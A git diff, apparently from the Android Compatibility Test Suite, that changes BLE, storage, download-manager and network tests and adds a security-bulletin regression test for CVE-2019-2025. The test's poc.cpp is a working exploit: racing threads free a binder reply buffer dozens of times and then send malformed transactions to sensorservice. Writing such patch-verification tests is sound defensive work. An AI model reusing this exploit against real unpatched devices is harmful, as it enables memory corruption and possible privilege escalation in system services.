- BluetoothGattCharacteristic characteristic =
- new BluetoothGattCharacteristic(CHARACTERISTIC_UUID, 0x0A, 0x11);
- BluetoothGattDescriptor descriptor = new BluetoothGattDescriptor(DESCRIPTOR_UUID, 0x11);
- characteristic.addDescriptor(descriptor);
- service.addCharacteristic(characteristic);
- characteristic = new BluetoothGattCharacteristic(START_CHARACTERISTIC_UUID, 0x0A, 0x11);
- characteristic.addDescriptor(descriptor);
- service.addCharacteristic(characteristic);
- characteristic = new BluetoothGattCharacteristic(STOP_CHARACTERISTIC_UUID, 0x0A, 0x11);
- characteristic.addDescriptor(descriptor);
- service.addCharacteristic(characteristic);
-
- return service;
- }
-
private final BluetoothGattServerCallback mCallbacks = new BluetoothGattServerCallback() {
@Override
public void onConnectionStateChange(BluetoothDevice device, int status, int newState) {
@@ -261,120 +177,50 @@ public class BleConnectionPriorityServerService extends Service { mDevice = device;
notifyConnected();
} else if (status == BluetoothProfile.STATE_DISCONNECTED) {
- cancelTimeoutTimer(true);
notifyDisconnected();
mDevice = null;
}
}
- }
- @Override
- public void onServiceAdded(int status, BluetoothGattService service) {
- if (DEBUG) {
- Log.d(TAG, "onServiceAdded()");
- }
- if (status == BluetoothGatt.GATT_SUCCESS) {
- notifyServiceAdded();
+ //onConnectionUpdated is hidden callback, can't be marked as @Override.
+ // We must have a call to it, otherwise compiler will delete it during optimization.
+ if (status == 0xFFEFFEE) {
+ // This should never execute, but will make compiler not remove onConnectionUpdated
+ onConnectionUpdated(null, 0, 0, 0, 0);
+ throw new IllegalStateException("This should never happen!");
}
+
}
- String mPriority = null;
+ // @Override uncomment once this becomes public API
+ public void onConnectionUpdated(BluetoothDevice device, int interval, int latency, int timeout, int status) {
+ Log.i(TAG, "onConnectionUpdated() status=" + status + ", interval=" + interval);
- @Override
- public void onCharacteristicWriteRequest(BluetoothDevice device, int requestId,
- BluetoothGattCharacteristic characteristic,
- boolean preparedWrite, boolean responseNeeded,
- int offset, byte[] value) {
- if (mGattServer == null) {
- if (DEBUG) {
- Log.d(TAG, "GattServer is null, return");
- }
- return;
- }
- if (DEBUG) {
- Log.d(TAG, "onCharacteristicWriteRequest: preparedWrite=" + preparedWrite);
+ if (status != 0) {
+ interval_low = interval_balanced = interval_high = 0;
+ return;
}
- if (characteristic.getUuid().equals(START_CHARACTERISTIC_UUID)) {
- // time out if previous measurement is running
- cancelTimeoutTimer(true);
+ // since we don't know when the test started, wait for three descending interval values.
+ // Even though conneciton is updated by service discovery, it never happen three times
+ // descending in any scenario.
- mPriority = new String(value);
- Log.d(TAG, "Start Count Up. Priority is " + mPriority);
- if (BleConnectionPriorityServerService.CONNECTION_PRIORITY_HIGH.equals(mPriority)) {
- notifyTestStart();
- }
-
- // start timeout timer
- mTimeoutTimer = new Timer(getClass().getName() + "_TimeoutTimer");
- mTimeoutTimerTask = new TimerTask() {
- @Override
- public void run() {
- // measurement timed out
- mTimeoutTimerTask = null;
- mTimeoutTimer = null;
- mReceiveWriteCount = 0;
- notifyMeasurementFinished(mPriority, Long.MAX_VALUE);
- }
- };
- mTimeoutTimer.schedule(mTimeoutTimerTask, (BleConnectionPriorityClientService.DEFAULT_PERIOD * 2));
-
- mReceiveWriteCount = 0;
- } else if (characteristic.getUuid().equals(STOP_CHARACTERISTIC_UUID)) {
- boolean isRunning = (mTimeoutTimerTask != null);
- cancelTimeoutTimer(false);
-
- String valeStr = new String(value);
- String priority = null;
- int writeCount = -1;
- int sep = valeStr.indexOf(",");
- if (sep > 0) {
- priority = valeStr.substring(0, sep);
- writeCount = Integer.valueOf(valeStr.substring(sep + 1));
- }
-
- if ((mPriority != null) && isRunning) {
- if (mPriority.equals(priority)) {
- long averageTime = BleConnectionPriorityClientService.DEFAULT_PERIOD / mReceiveWriteCount;
- notifyMeasurementFinished(mPriority, averageTime);
- Log.d(TAG, "Received " + mReceiveWriteCount + " of " + writeCount + " messages");
- } else {
- Log.d(TAG, "Connection priority does not match");
- showMessage("Connection priority does not match");
- }
- } else {
- Log.d(TAG, "Not Start Count UP.");
- }
- mReceiveWriteCount = 0;
- } else {
- if (mTimeoutTimerTask != null) {
- ++mReceiveWriteCount;
- }
- if (!preparedWrite) {
- characteristic.setValue(value);
- }
- }
+ // shift all values
+ interval_low = interval_balanced;
+ interval_balanced = interval_high;
+ interval_high = interval;
- if (responseNeeded) {
- mGattServer.sendResponse(device, requestId, BluetoothGatt.GATT_SUCCESS, 0, null);
+ // If we end up with three descending values, test is passed.
+ if (interval_low > interval_balanced && interval_balanced > interval_high) {
+ showMessage("intervals: " + interval_low +" > " + interval_balanced + " > " + interval_high);
+ notifyMeasurementFinished();
}
}
};
- private void notifyMeasurementFinished(String priority, long averageTime) {
+ private void notifyMeasurementFinished() {
Intent intent = new Intent();
- intent.putExtra(EXTRA_AVERAGE, averageTime);
- switch (priority) {
- case CONNECTION_PRIORITY_HIGH:
- intent.setAction(ACTION_FINICH_CONNECTION_PRIORITY_HIGHT);
- break;
- case CONNECTION_PRIORITY_BALANCED:
- intent.setAction(ACTION_FINICH_CONNECTION_PRIORITY_BALANCED);
- break;
- case CONNECTION_PRIORITY_LOW_POWER:
- intent.setAction(ACTION_FINICH_CONNECTION_PRIORITY_LOW);
- break;
- }
+ intent.setAction(ACTION_CONNECTION_PRIORITY_FINISH);
sendBroadcast(intent);
}
diff --git a/hostsidetests/appsecurity/test-apps/ExternalStorageApp/src/com/android/cts/externalstorageapp/CommonExternalStorageTest.java b/hostsidetests/appsecurity/test-apps/ExternalStorageApp/src/com/android/cts/externalstorageapp/CommonExternalStorageTest.java index 753977b19a3..be8b785a65c 100644 --- a/hostsidetests/appsecurity/test-apps/ExternalStorageApp/src/com/android/cts/externalstorageapp/CommonExternalStorageTest.java +++ b/hostsidetests/appsecurity/test-apps/ExternalStorageApp/src/com/android/cts/externalstorageapp/CommonExternalStorageTest.java @@ -169,13 +169,11 @@ public class CommonExternalStorageTest extends AndroidTestCase { public static List<File> getAllPackageSpecificObbGiftPaths(Context context, String targetPackageName) { - final File[] files = context.getObbDirs(); final List<File> targetFiles = new ArrayList<>(); - for (File file : files) { - final File targetFile = new File( - file.getAbsolutePath().replace(context.getPackageName(), targetPackageName)); - targetFiles.add(new File(targetFile, targetPackageName + ".gift")); - } + final File obbDir = context.getObbDir(); + final File targetObbDir = new File( + obbDir.getAbsolutePath().replace(context.getPackageName(), targetPackageName)); + targetFiles.add(new File(targetObbDir, targetPackageName + ".gift")); return targetFiles; } diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index 28d06a9bab5..44eedc10fa0 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -187,6 +187,7 @@ <!-- Bulletin 2019-03 --> <!-- Please add tests solely from this bulletin below to avoid merge conflict --> <option name="push" value="Bug-115739809->/data/local/tmp/Bug-115739809" /> + <option name="push" value="CVE-2019-2025->/data/local/tmp/CVE-2019-2025" /> <option name="append-bitness" value="true" /> </target_preparer> diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/Android.mk new file mode 100644 index 00000000000..9e62920112a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/Android.mk @@ -0,0 +1,38 @@ +# Copyright (C) 2019 The Android Open Source Project +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +LOCAL_PATH := $(call my-dir) + +include $(CLEAR_VARS) +LOCAL_MODULE := CVE-2019-2025 +LOCAL_SRC_FILES := poc.cpp +LOCAL_MULTILIB := both +LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32 +LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64 + +LOCAL_SHARED_LIBRARIES := \ + libutils \ + liblog \ + libcutils \ + libsensor \ + libbase \ + libbinder \ + +LOCAL_COMPATIBILITY_SUITE := cts vts sts +LOCAL_CTS_TEST_PACKAGE := android.security.cts + +LOCAL_ARM_MODE := arm +LOCAL_CFLAGS := -Wall -Werror + +include $(BUILD_CTS_EXECUTABLE) diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/IPCThreadState.h b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/IPCThreadState.h new file mode 100644 index 00000000000..38169fd097e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/IPCThreadState.h @@ -0,0 +1,140 @@ +/* + * Copyright (C) 2005 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#ifndef ANDROID_IPC_THREAD_STATE_H +#define ANDROID_IPC_THREAD_STATE_H + +#include <utils/Errors.h> +#include <binder/Parcel.h> +#include <binder/ProcessState.h> +#include <utils/Vector.h> + +#if defined(_WIN32) +typedef int uid_t; +#endif + +// --------------------------------------------------------------------------- +namespace android { + +class IPCThreadState +{ +public: + static IPCThreadState* self(); + static IPCThreadState* selfOrNull(); // self(), but won't instantiate + + sp<ProcessState> process(); + + status_t clearLastError(); + + pid_t getCallingPid() const; + uid_t getCallingUid() const; + + void setStrictModePolicy(int32_t policy); + int32_t getStrictModePolicy() const; + + void setLastTransactionBinderFlags(int32_t flags); + int32_t getLastTransactionBinderFlags() const; + + int64_t clearCallingIdentity(); + void restoreCallingIdentity(int64_t token); + + int setupPolling(int* fd); + status_t handlePolledCommands(); + void flushCommands(); + + void joinThreadPool(bool isMain = true); + + // Stop the local process. + void stopProcess(bool immediate = true); + + status_t transact(int32_t handle, + uint32_t code, const Parcel& data, + Parcel* reply, uint32_t flags); + + void incStrongHandle(int32_t handle, BpBinder *proxy); + void decStrongHandle(int32_t handle); + void incWeakHandle(int32_t handle, BpBinder *proxy); + void decWeakHandle(int32_t handle); + status_t attemptIncStrongHandle(int32_t handle); + static void expungeHandle(int32_t handle, IBinder* binder); + status_t requestDeathNotification( int32_t handle, + BpBinder* proxy); + status_t clearDeathNotification( int32_t handle, + BpBinder* proxy); + + static void shutdown(); + + // Call this to disable switching threads to background scheduling when + // receiving incoming IPC calls. This is specifically here for the + // Android system process, since it expects to have background apps calling + // in to it but doesn't want to acquire locks in its services while in + // the background. + static void disableBackgroundScheduling(bool disable); + bool backgroundSchedulingDisabled(); + + // Call blocks until the number of executing binder threads is less than + // the maximum number of binder threads threads allowed for this process. + void blockUntilThreadAvailable(); + static void freeBuffer(Parcel* parcel, + const uint8_t* data, size_t dataSize, + const binder_size_t* objects, size_t objectsSize, + void* cookie); + static void freeBuffer1(Parcel* parcel, + const uint8_t* data, size_t dataSize, + const binder_size_t* objects, size_t objectsSize, + void* cookie); +private: + IPCThreadState(); + ~IPCThreadState(); + + status_t sendReply(const Parcel& reply, uint32_t flags); + status_t waitForResponse(Parcel *reply, + status_t *acquireResult=NULL); + status_t talkWithDriver(bool doReceive=true); + status_t writeTransactionData(int32_t cmd, + uint32_t binderFlags, + int32_t handle, + uint32_t code, + const Parcel& data, + status_t* statusBuffer); + status_t getAndExecuteCommand(); + status_t executeCommand(int32_t command); + void processPendingDerefs(); + void processPostWriteDerefs(); + + void clearCaller(); + + static void threadDestructor(void *st); + + const sp<ProcessState> mProcess; + Vector<BBinder*> mPendingStrongDerefs; + Vector<RefBase::weakref_type*> mPendingWeakDerefs; + Vector<RefBase*> mPostWriteStrongDerefs; + Vector<RefBase::weakref_type*> mPostWriteWeakDerefs; + Parcel mIn; + Parcel mOut; + status_t mLastError; + pid_t mCallingPid; + uid_t mCallingUid; + int32_t mStrictModePolicy; + int32_t mLastTransactionBinderFlags; +}; + +}; // namespace android + +// --------------------------------------------------------------------------- + +#endif // ANDROID_IPC_THREAD_STATE_H diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/poc.cpp new file mode 100644 index 00000000000..58e3c845152 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2025/poc.cpp @@ -0,0 +1,171 @@ +/** + * Copyright (C) 2019 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#include <cutils/ashmem.h> +#include <dlfcn.h> +#include <fcntl.h> +#include <linux/futex.h> +#include <pthread.h> +#include <sensor/ISensorEventConnection.h> +#include <sensor/ISensorServer.h> +#include <sensor/Sensor.h> +#include <stdio.h> +#include <stdlib.h> +#include <sys/mman.h> +#include <sys/prctl.h> +#include <sys/stat.h> +#include <sys/syscall.h> +#include <sys/types.h> +#include <sys/wait.h> +#include <sys/xattr.h> +#include <utils/Vector.h> + +#include "IPCThreadState.h" +#include "binder/IServiceManager.h" +#include "../includes/common.h" + +using namespace android; + +#define SLEEP 0 +#define ATTACK 1 +String8 packageName("hexb1n"); +String16 opPackageName(""); + +time_t test_started; + +static volatile int attack_signal; +int my_futex(volatile int *uaddr, int op, int val, + const struct timespec *timeout, int *uaddr2, int val3) { + return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3); +} + +static void *bcfree_helper(void *p) { + (void) p; + Parcel data, reply; + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("sensorservice")); + sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder); + sp<ISensorEventConnection> sensorEventConnection = + sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/, + opPackageName); + while (timer_active(test_started)) { + Parcel data, reply; + data.writeInterfaceToken(String16("android.gui.SensorEventConnection")); + my_futex(&attack_signal, FUTEX_WAIT_PRIVATE, SLEEP, NULL, NULL, 0); + usleep(100); + IInterface::asBinder(sensorEventConnection) + ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0); + } + + return NULL; +} + +static void *bcfree(void *p) { + (void) p; + Parcel data, reply; + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("sensorservice")); + sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder); + sp<ISensorEventConnection> sensorEventConnection = + sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/, + opPackageName); + while (timer_active(test_started)) { + Parcel data, reply; + data.writeInterfaceToken(String16("android.gui.SensorEventConnection")); + + { + IInterface::asBinder(sensorEventConnection) + ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0); + const uint8_t *rmData = reply.data(); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL); + } + + attack_signal = ATTACK; + my_futex(&attack_signal, FUTEX_WAKE_PRIVATE, 1, NULL, NULL, 0); + usleep(100); + { + Parcel data, reply; + IInterface::asBinder(sensorEventConnection) + ->transact(0xdeadbfff /*FLUSH_SENSOR*/, data, &reply, 0x2f2f); + for (int i = 0; i < 20; i++) + IInterface::asBinder(sensorEventConnection) + ->transact(0xdeadbfff /*FLUSH_SENSOR*/, data, &reply, 0x2f2f); + } + attack_signal = SLEEP; + } + + return NULL; +} + +int main() { + pthread_t t1, t2, t3; + + test_started = start_timer(); + + pthread_create(&t1, NULL, bcfree_helper, NULL); + pthread_create(&t2, NULL, bcfree, NULL); + pthread_create(&t3, NULL, bcfree_helper, NULL); + pthread_join(t1, NULL); + pthread_join(t2, NULL); + pthread_join(t3, NULL); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java index 115fad285cd..520c9fc0743 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java @@ -31,4 +31,12 @@ public class Poc19_03 extends SecurityTestCase { public void testPocBug_115739809() throws Exception { assertFalse(AdbUtils.runPocCheckExitCode("Bug-115739809", getDevice(), 30)); } + + /** + * b/116855682 + */ + @SecurityTest(minPatchLevel = "2019-03") + public void testPocCVE_2019_2025() throws Exception { + AdbUtils.runPocNoOutput("CVE-2019-2025", getDevice(), 300); + } } diff --git a/tests/app/DownloadManagerApi28Test/src/android/app/cts/DownloadManagerApi28Test.java b/tests/app/DownloadManagerApi28Test/src/android/app/cts/DownloadManagerApi28Test.java index 77d20715509..5d588ff0b65 100644 --- a/tests/app/DownloadManagerApi28Test/src/android/app/cts/DownloadManagerApi28Test.java +++ b/tests/app/DownloadManagerApi28Test/src/android/app/cts/DownloadManagerApi28Test.java @@ -26,6 +26,7 @@ import android.content.IntentFilter; import android.database.Cursor; import android.net.Uri; import android.os.Environment; +import android.os.FileUtils; import androidx.test.runner.AndroidJUnit4; @@ -34,6 +35,9 @@ import org.junit.runner.RunWith; import java.io.File; import java.io.FileInputStream; +import java.io.FileOutputStream; +import java.io.InputStream; +import java.io.OutputStream; @RunWith(AndroidJUnit4.class) public class DownloadManagerApi28Test extends DownloadManagerTestBase { @@ -197,6 +201,7 @@ public class DownloadManagerApi28Test extends DownloadManagerTestBase { */ @Test public void testAddCompletedDownload_mediaStoreEntry() throws Exception { + final String assetName = "noiseandchirps.mp3"; final String[] downloadPath = new String[] { new File(Environment.getExternalStoragePublicDirectory( Environment.DIRECTORY_DOWNLOADS), "file1.mp3").getPath(), @@ -205,13 +210,15 @@ public class DownloadManagerApi28Test extends DownloadManagerTestBase { "/sdcard/file3.mp3", }; for (String downloadLocation : downloadPath) { - final String fileContents = "Test content:" + downloadLocation + "_" + System.nanoTime(); final File file = new File(Uri.parse(downloadLocation).getPath()); - writeToFile(file, fileContents); + try (InputStream in = mContext.getAssets().open(assetName); + OutputStream out = new FileOutputStream(file)) { + FileUtils.copy(in, out); + } final long downloadId = mDownloadManager.addCompletedDownload(file.getName(), "Test desc", true, - "text/plain", downloadLocation, fileContents.getBytes().length, true); + "audio/mp3", downloadLocation, file.length(), true); assertTrue(downloadId >= 0); final Uri downloadUri = mDownloadManager.getUriForDownloadedFile(downloadId); final Uri mediaStoreUri = getMediaStoreUri(downloadUri); diff --git a/tests/tests/net/jni/NativeMultinetworkJni.cpp b/tests/tests/net/jni/NativeMultinetworkJni.cpp index a6b5e90b1da..5bd3013819d 100644 --- a/tests/tests/net/jni/NativeMultinetworkJni.cpp +++ b/tests/tests/net/jni/NativeMultinetworkJni.cpp @@ -455,13 +455,17 @@ JNIEXPORT jint Java_android_net_cts_MultinetworkApiTest_runDatagramCheck( setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &timeo, sizeof(timeo)); // For reference see: - // https://tools.ietf.org/html/draft-tsvwg-quic-protocol-01#section-6.1 - uint8_t quic_packet[] = { - 0x0c, // public flags: 64bit conn ID, 8bit sequence number + // https://tools.ietf.org/html/draft-tsvwg-quic-protocol#section-6.1 + uint8_t quic_packet[1200] = { + 0x0d, // public flags: + // - version present (0x01), + // - 64bit connection ID (0x0c), + // - 1 byte packet number (0x00) 0, 0, 0, 0, 0, 0, 0, 0, // 64bit connection ID - 0x01, // sequence number + 0xaa, 0xda, 0xca, 0xaa, // reserved-space version number + 1, // 1 byte packet number 0x00, // private flags - 0x07, // type: regular frame type "PING" + 0x07, // PING frame (cuz why not) }; arc4random_buf(quic_packet + 1, 8); // random connection ID @@ -489,7 +493,7 @@ JNIEXPORT jint Java_android_net_cts_MultinetworkApiTest_runDatagramCheck( i + 1, MAX_RETRIES, rcvd, errnum); } } - if (rcvd < sent) { + if (rcvd < 9) { ALOGD("QUIC UDP %s: sent=%zd but rcvd=%zd, errno=%d", kPort, sent, rcvd, errnum); if (rcvd <= 0) { ALOGD("Does this network block UDP port %s?", kPort); @@ -505,8 +509,7 @@ JNIEXPORT jint Java_android_net_cts_MultinetworkApiTest_runDatagramCheck( return -EPROTO; } - // TODO: log, and compare to the IP address encoded in the - // response, since this should be a public reset packet. + // TODO: Replace this quick 'n' dirty test with proper QUIC-capable code. close(fd); return 0; |